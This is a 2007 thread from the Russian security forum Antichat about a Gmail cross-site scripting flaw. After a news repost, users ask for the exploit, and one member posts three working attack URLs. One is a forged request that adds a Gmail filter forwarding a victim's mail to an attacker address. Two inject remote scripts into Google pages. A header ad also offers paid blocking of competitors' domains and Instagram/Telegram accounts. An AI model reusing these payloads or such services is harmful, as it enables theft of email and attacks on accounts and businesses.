УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Мировые новости
Новая уязвимость в сервисах Google: кража писем из Gmail

Опции темы

Поиск в этой теме

Опции просмотра

Новая уязвимость в сервисах Google: кража писем из Gmail

27.09.2007, 16:24

GiZZZ

Познающий

Регистрация: 23.05.2007

Сообщений: 32

Провел на форуме:
258680

Репутация: 26

Отправить сообщение для GiZZZ с помощью ICQ

Новая уязвимость в сервисах Google: кража писем из Gmail

27.09.07, Чт, 14:04, Мск
_http://internet.cnews.ru/news/line/index.shtml?2007/09/27/267960

В дополнение к трем уязвимостям(я выкладывал новость вчера, но ее удалили...) в продуктах и сервисах Google – Groups, поисковой машине и Picasa, обнаруженным на этой неделе, в среду, 26 сентября, в системе сервисов портала найдена еще одна. Уязвимость позволяет похитить письма из ящика Gmail.

Уязвимость обнаружил исследователь GNU Citizen Петко Петков (Petko D. Petkov), сообщает The Register. Она, как и три вышеупомянутые, относится к классу межсайтового скриптинга (CSS/XSS). При переходе по URL, содержащему JavaScript-код в значении одного из параметров вызова веб-страницы, этот код выполняется на самой странице от имени сайта, к которому обратился пользователь. Подобные уязвимости вызваны отсутствием проверки содержимого параметров перед тем, как вывести его на веб-страницу. Надежно написанные веб-приложения отсеивают HTML-тэги, включая JavaScript.

Обычно при помощи CSS/XSS крадут куки с данными об авторизации или подгружают файлы, которые пользователь запустит, доверяя уязвимому сайту. В случае с Gmail злоумышленник может при помощи кода добавить в учетную запись фильтр, копирующий письма по указанному адресу. Для того чтобы уязвимость можно было использовать, в браузере жертвы должен быть открыт почтовый ящик Gmail.

27.09.2007, 17:34

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

Провел на форуме:
5749763

Репутация: 1680

Отправить сообщение для Nightmarе с помощью ICQ

Ccылку на XSS мне в ЛС отошли плз.

27.09.2007, 20:54

DCSTAJIKER

Новичок

Регистрация: 01.05.2007

Сообщений: 7

Провел на форуме:
26782

Репутация: 7

и мне плз потому что сдеть сотрут если еще напишешь(

27.09.2007, 21:45

GiZZZ

Познающий

Регистрация: 23.05.2007

Сообщений: 32

Провел на форуме:
258680

Репутация: 26

это лишь новость, опубликованная в СМИ
все подробности и ссылки лишь у

Цитата:

Уязвимость обнаружил исследователь GNU Citizen Петко Петков (Petko D. Petkov), сообщает The Register.

27.09.2007, 21:51

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

Отправить сообщение для SanyaX с помощью ICQ

Угу так и он что то кому то скажет

__________________
-=Ok let's Go=-
-=OpenVPN=-

27.09.2007, 22:30

GiZZZ

Познающий

Регистрация: 23.05.2007

Сообщений: 32

Провел на форуме:
258680

Репутация: 26

Цитата:

Сообщение от SanyaX

Угу так и он что то кому то скажет

угу...именно это и имел ввиду)

27.09.2007, 23:18

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

Провел на форуме:
5749763

Репутация: 1680

номер его дайте - скажет.

29.09.2007, 02:33

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Код:

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter

вот и сам хэк код кстати говоря)

и ещё парочка, которые выложили раньше, но из-за непопулярности блога никто ничё незаметил)

Код:

http://mail.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=url.blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3E%3Cscript+src%3Dhttp://beford.org/stuff/prototype.js%3E%3C/script%3E%3Cscript+src%3Dhttp://beford.org/stuff/x2.js%3E%3C/script%3E%3Cnoscript%3E/

Код:

http://groups.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3E%3Cscript+src%3Dhttp://beford.org/stuff/x.js%3E%3C/script%3E%3Cnoscript%3E/

__________________

Последний раз редактировалось +toxa+; 29.09.2007 в 02:36..

29.09.2007, 14:05

~~zooomer~~

Banned

Регистрация: 17.04.2007

Сообщений: 126

Провел на форуме:
318051

Репутация: 38

Отправить сообщение для zooomer с помощью ICQ

Хааа....Тоха респект....Новость интересная +) Репа..

#10

30.09.2007, 09:23

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

гг.. засекаем время когда закроют )

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Google исполнилось десять лет	SkvO	Мировые новости	21	28.09.2007 10:07
У Google под колпаком ! ШПИОНСКАЯ ВКЛАДКА XXI ВЕКА	FuseR	Чужие Статьи	6	30.06.2007 21:04
Google устранил уязвимость в Gmail	KPOT_f!nd	Мировые новости	0	06.01.2007 07:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход